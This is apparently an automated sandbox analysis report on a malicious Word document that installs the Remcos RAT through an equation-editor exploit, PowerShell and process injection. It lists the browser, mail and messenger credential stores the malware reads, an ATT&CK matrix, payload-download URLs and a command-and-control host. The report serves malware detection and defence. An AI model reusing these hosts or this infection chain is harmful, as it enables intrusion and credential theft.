                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqlite
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\Paltalk
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: ESMTPPassword 23_2_004033F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword 23_2_00402DB3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword 23_2_00402DB3
                  Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 3608, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 3880, type: MEMORYSTR

                  Remote Access Functionality

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-N6HMP4
                  Source: Yara match | File source: 20.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 20.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000014.00000002.696341124.0000000000755000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000013.00000002.515289278.00000000038C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: powershell.exe PID: 2924, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 3608, type: MEMORYSTR
                  Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\wordse\logs.dat, type: DROPPED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: cmd.exe 20_2_0040569A
                  MITRE ATT&CK Matrix (techniques listed per tactic column; numbers in parentheses are the counts shown next to a technique in the report's matrix)

                  Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances
                  Resource Development: Scripting (111); Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains
                  Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools
                  Execution: Native API (11); Exploitation for Client Execution (43); Command and Scripting Interpreter (133); Service Execution (2); PowerShell (4); Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript
                  Persistence: Scripting (111); DLL Side-Loading (1); Windows Service (1); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
                  Privilege Escalation: DLL Side-Loading (1); Bypass User Account Control (1); Access Token Manipulation (1); Windows Service (1); Process Injection (422); RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
                  Defense Evasion: Deobfuscate/Decode Files or Information (11); Obfuscated Files or Information (21); Install Root Certificate (1); DLL Side-Loading (1); Bypass User Account Control (1); Masquerading (1); Virtualization/Sandbox Evasion (31); Access Token Manipulation (1); Process Injection (422); Dynamic API Resolution; Stripped Payloads
                  Credential Access: OS Credential Dumping (2); Input Capture (211); Credentials in Registry (2); Credentials In Files (3); LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture
                  Discovery: System Time Discovery (2); Account Discovery (1); System Service Discovery (1); File and Directory Discovery (4); System Information Discovery (39); Security Software Discovery (3); Virtualization/Sandbox Evasion (31); Process Discovery (4); Application Window Discovery (1); System Owner/User Discovery (1); Remote System Discovery (1)
                  Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools
                  Collection: Archive Collected Data (11); Data from Local System (1); Email Collection (21); Input Capture (211); Clipboard Data (4); GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging
                  Command and Control: Ingress Tool Transfer (15); Encrypted Channel (21); Non-Standard Port (1); Remote Access Software (1); Non-Application Layer Protocol (3); Application Layer Protocol (114); Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols
                  Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol
                  Impact: System Shutdown/Reboot (1); Defacement (1); Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  Behavior Graph ID: 1540324; Sample: PO NAHK22012FA00000.docx.doc; Startdate: 23/10/2024; Architecture: WINDOWS; Score: 100
                  Start node: u4u.kids; signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 28 other signatures

                  Process tree recovered from the behavior graph (indentation = parent/child):

                  WINWORD.EXE 365 56
                    Network: u4u.kids 24.199.88.84, 443, 49161, 49162 TWC-12271-NYCUS United States; 85.215.206.82, 49167, 49169, 49170 STRATOSTRATOAGDE Germany
                    Dropped: C:\...\PO NAHK22012FA00000.docx.doc (copy), Microsoft; C:\Users\user\...\wg on 85.215.206.82.url, MS; ~WRF{DE8BB6AA-6431...3-75296C786D33}.tmp, Composite
                    Signatures: Microsoft Office launches external ms-search protocol handler (WebDAV); Office viewer loads remote template; Microsoft Office drops suspicious files
                    EQNEDT32.EXE 12
                      Dropped: wennedgreatthingsw...odnwesforentrie.hta, HTML; wennedgreatthingsw...elifewithnew[1].hta, HTML
                      Signatures: Office equation editor establishes network connection; Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
                      mshta.exe 10
                        Signatures: Suspicious powershell command line found; PowerShell case anomaly found
                        powershell.exe 24
                          Dropped: getbestthingswithb...thgreatthingson.vbS, Unicode; C:\Users\user\AppData\...\j0qjax5r.cmdline, Unicode
                          Signatures: Suspicious powershell command line found; Obfuscated command line found
                          wscript.exe 1
                            Signatures: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); Bypasses PowerShell execution policy; 2 other signatures
                            powershell.exe 4
                              Signatures: Suspicious powershell command line found; Obfuscated command line found
                              powershell.exe
                                Network: drive.google.com 142.250.181.238, 443, 49171 GOOGLEUS United States; drive.usercontent.google.com 216.58.212.129, 443, 49172 GOOGLEUS United States
                                Signatures: Writes to foreign memory regions; Injects a PE file into a foreign processes
                                CasPol.exe
                                  Network: servemail.exprotedsteel.pro 45.90.89.98, 49174, 49175, 6498 CMCSUS Bulgaria; geoplugin.net 178.237.33.50, 49176, 80 ATOM86-ASATOM86NL Netherlands
                                  Dropped: C:\Users\user\AppData\Local\Temp\...\logs.dat, data
                                  Signatures: Contains functionality to bypass UAC (CMSTPLUA); Detected Remcos RAT; Tries to steal Mail credentials (via file registry); 8 other signatures
                                  CasPol.exe
                                    Signatures: Tries to steal Instant Messenger accounts or passwords; Tries to steal Mail credentials (via file / registry access); Searches for Windows Mail specific files
                                  CasPol.exe
                                    Signatures: Tries to harvest and steal browser information (history, passwords, etc)
                                  CasPol.exe
                                  CasPol.exe
                          powershell.exe 4
                            Signatures: Installs new ROOT certificates
                          csc.exe 2
                            Dropped: C:\Users\user\AppData\Local\...\j0qjax5r.dll, PE32
                            cvtres.exe

                  Source | Detection | Scanner | Label | Link
                  PO NAHK22012FA00000.docx.doc | 13% | ReversingLabs | Win32.Trojan.Generic |

                  Source | Detection | Scanner | Label | Link
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{DE8BB6AA-6431-42DF-A763-75296C786D33}.tmp | 100% | Avira | EXP/CVE-2017-11882.Gen |

                  No Antivirus matches

                  No Antivirus matches

                  Source | Detection | Scanner | Label | Link
                  http://www.imvu.comr | 0% | URL Reputation | safe |
                  http://ocsp.entrust.net03 | 0% | URL Reputation | safe |
                  https://contoso.com/License | 0% | URL Reputation | safe |
                  http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe |
                  https://deff.nelreports.net/api/report?cat=msn | 0% | URL Reputation | safe |
                  https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js | 0% | URL Reputation | safe |
                  http://go.micros | 0% | URL Reputation | safe |
                  http://geoplugin.net/json.gp/C | 0% | URL Reputation | safe |
                  https://contoso.com/ | 0% | URL Reputation | safe |
                  https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
                  https://login.yahoo.com/config/login | 0% | URL Reputation | safe |
                  http://ocsp.entrust.net0D | 0% | URL Reputation | safe |
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
                  http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
                  http://crl.entrust.net/server1.crl0 | 0% | URL Reputation | safe |
                  http://www.imvu.com | 0% | URL Reputation | safe |
                  https://contoso.com/Icon | 0% | URL Reputation | safe |
                  http://geoplugin.net/json.gp | 0% | URL Reputation | safe |
                  https://secure.comodo.com/CPS0 | 0% | URL Reputation | safe |
                  http://crl.entrust.net/2048ca.crl0 | 0% | URL Reputation | safe |
                  http://www.ebuddy.com | 0% | URL Reputation | safe |
                  Name | IP | Active | Malicious | Antivirus Detection | Reputation
                  geoplugin.net | 178.237.33.50 | true | false | | unknown
                  drive.google.com | 142.250.181.238 | true | false | | unknown
                  drive.usercontent.google.com | 216.58.212.129 | true | false | | unknown
                  servemail.exprotedsteel.pro | 45.90.89.98 | true | true | | unknown
                  u4u.kids | 24.199.88.84 | true | true | | unknown
                  Name | Malicious | Antivirus Detection | Reputation
                  http://85.215.206.82/270/weg/wg/deethebestthingwithmegreatattirudewithgreatthigns_________eniterlifewithgreatniceworkingskillwithmebgreatthignstobe________verynicepersonentiterlifewithnewthisnfds.doc | true | | unknown
                  https://u4u.kids/clm3hy?&sing=cuddly&brain=hapless&kingfish=perpetual&cake=scientific&bacon=kindhearted&jelly=pumped&reveal=reflective&clock=agonizing&yak | true | | unknown
                  http://geoplugin.net/json.gp | false | URL Reputation: safe | unknown
                  http://85.215.206.82/270/weg/wennedgreatthingswithgoodnwesforentrielifewithnew.hta | true | | unknown
                  http://85.215.206.82/270/WRFFDCE.txt | true | | unknown
                  http://85.215.206.82/270/igetbestthingswithbestpicturewithgreatthingsonme.tIF | true | | unknown
                  Name | Source | Malicious | Antivirus Detection | Reputation
                  http://85.215.206.82/270/weg/wennedgreatthingswithgoodnwesforentrielifewithnew.hta: | EQNEDT32.EXE, 00000008.00000002.415353153.00000000008DF000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                  http://b.scorecardresearch.com/beacon.js | bhv2D0A.tmp.22.dr | false | | unknown
                  http://acdn.adnxs.com/ast/ast.js | bhv2D0A.tmp.22.dr | false | | unknown
                  http://www.imvu.comr | CasPol.exe, 00000018.00000002.527130707.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
                  http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_ | bhv2D0A.tmp.22.dr | false | | unknown
                  http://ocsp.entrust.net03 | powershell.exe, 00000013.00000002.522222538.0000000005153000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                  https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1 | bhv2D0A.tmp.22.dr | false | | unknown
                  https://contoso.com/License | powershell.exe, 0000000B.00000002.456616476.0000000003529000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                  https://support.google.com/chrome/?p=plugin_flash | CasPol.exe, 00000016.00000002.531960219.0000000002A60000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                  http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png | bhv2D0A.tmp.22.dr | false | | unknown
                  http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | powershell.exe, 00000013.00000002.522222538.0000000005153000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                  http://www.diginotar.nl/cps/pkioverheid0 | powershell.exe, 00000013.00000002.522222538.0000000005153000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                  https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9 | bhv2D0A.tmp.22.dr | false | | unknown
                                                        unknown
                                                        http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.htmlbhv2D0A.tmp.22.drfalse
                                                          unknown
                                                          https://deff.nelreports.net/api/report?cat=msnbhv2D0A.tmp.22.drfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.jsbhv2D0A.tmp.22.drfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://go.microspowershell.exe, 0000000B.00000002.455991013.0000000002BF7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comCasPol.exe, 00000018.00000002.527130707.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                            unknown
                                                            http://cache.btrll.com/default/Pix-1x1.gifbhv2D0A.tmp.22.drfalse
                                                              unknown
                                                              http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683bhv2D0A.tmp.22.drfalse
                                                                unknown
                                                                https://www.google.comCasPol.exe, CasPol.exe, 00000018.00000002.527130707.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                  unknown
                                                                  http://geoplugin.net/json.gpECasPol.exe, 00000014.00000002.696341124.0000000000755000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    http://geoplugin.net/json.gp/Cpowershell.exe, 00000013.00000002.515289278.00000000038C8000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://o.aolcdn.com/ads/adswrappermsni.jsbhv2D0A.tmp.22.drfalse
                                                                      unknown
                                                                      http://cdn.taboola.com/libtrc/msn-home-network/loader.jsbhv2D0A.tmp.22.drfalse
                                                                        unknown
                                                                        http://www.msn.com/?ocid=iehpbhv2D0A.tmp.22.drfalse
                                                                          unknown
                                                                          https://contoso.com/powershell.exe, 0000000B.00000002.456616476.0000000003529000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://nuget.org/nuget.exepowershell.exe, 0000000B.00000002.456616476.0000000003529000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033bhv2D0A.tmp.22.drfalse
                                                                            unknown
                                                                            http://static.chartbeat.com/js/chartbeat.jsbhv2D0A.tmp.22.drfalse
                                                                              unknown
                                                                              http://www.msn.com/de-de/?ocid=iehpbhv2D0A.tmp.22.drfalse
                                                                                unknown
                                                                                http://85.215.206.82/270/weg/wennedgreatthingswithgoodnwesforentrielifewithnew.htajEQNEDT32.EXE, 00000008.00000002.415353153.00000000008DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  https://drive.usercontent.google.compowershell.exe, 00000013.00000002.515289278.0000000002758000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%bhv2D0A.tmp.22.drfalse
                                                                                      unknown
                                                                                      https://login.yahoo.com/config/loginCasPol.exefalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      http://www.nirsoft.net/CasPol.exe, 00000018.00000002.527130707.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        http://ocsp.entrust.net0Dpowershell.exe, 00000013.00000002.522222538.0000000005153000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000B.00000002.455991013.0000000002501000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.589694416.0000000002528000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.515289278.0000000002501000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3bhv2D0A.tmp.22.drfalse
                                                                                          unknown
                                                                                          http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683bhv2D0A.tmp.22.drfalse
                                                                                            unknown
                                                                                            http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(bhv2D0A.tmp.22.drfalse
                                                                                              unknown
                                                                                              https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9bhv2D0A.tmp.22.drfalse
                                                                                                unknown
                                                                                                http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_shbhv2D0A.tmp.22.drfalse
                                                                                                  unknown
                                                                                                  http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.jsbhv2D0A.tmp.22.drfalse
                                                                                                    unknown
                                                                                                    http://nuget.org/NuGet.exepowershell.exe, 0000000B.00000002.456616476.0000000003529000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    https://www.ccleaner.com/go/app_cc_pro_trialkeybhv2D0A.tmp.22.drfalse
                                                                                                      unknown
                                                                                                      http://crl.entrust.net/server1.crl0powershell.exe, 00000013.00000002.522222538.0000000005153000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://www.imvu.com/yCasPol.exe, 00000018.00000002.527037105.000000000019C000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                        unknown
                                                                                                        https://contextual.media.net/8/nrrV73987.jsbhv2D0A.tmp.22.drfalse
                                                                                                          unknown
                                                                                                          http://www.imvu.comCasPol.exe, CasPol.exe, 00000018.00000002.527291764.0000000000459000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000018.00000002.527130707.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          https://contoso.com/Iconpowershell.exe, 0000000B.00000002.456616476.0000000003529000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://geoplugin.net/json.gpwCasPol.exe, 00000014.00000002.696341124.0000000000755000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            https://contextual.media.net/bhv2D0A.tmp.22.drfalse
                                                                                                              unknown
                                                                                                              http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.jsbhv2D0A.tmp.22.drfalse
                                                                                                                unknown
                                                                                                                https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2bhv2D0A.tmp.22.drfalse
                                                                                                                  unknown
                                                                                                                  http://www.msn.com/bhv2D0A.tmp.22.drfalse
                                                                                                                    unknown
                                                                                                                    https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:aubhv2D0A.tmp.22.drfalse
                                                                                                                      unknown
                                                                                                                      http://85.215.206.82/270/weg/wg/wg on 85.215.206.82.url.0.drfalse
                                                                                                                        unknown
                                                                                                                        http://crl.pkioverheid.nl/DomOvLatestCRL.crl0powershell.exe, 00000013.00000002.522222538.0000000005153000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          unknown
                                                                                                                          https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549bhv2D0A.tmp.22.drfalse
                                                                                                                            unknown
                                                                                                                            https://support.googleCasPol.exe, 00000016.00000002.531817073.0000000001D9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              https://drive.google.compowershell.exe, 00000013.00000002.515289278.0000000002639000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                unknown
                                                                                                                                http://cdn.at.atwola.com/_media/uac/msn.htmlbhv2D0A.tmp.22.drfalse
                                                                                                                                  unknown
                                                                                                                                  https://www.google.com/accounts/serviceloginCasPol.exefalse
                                                                                                                                    unknown
                                                                                                                                    http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fsetbhv2D0A.tmp.22.drfalse
                                                                                                                                      unknown
                                                                                                                                      https://secure.comodo.com/CPS0powershell.exe, 00000013.00000002.522222538.0000000005153000.00000004.00000020.00020000.00000000.sdmpfalse
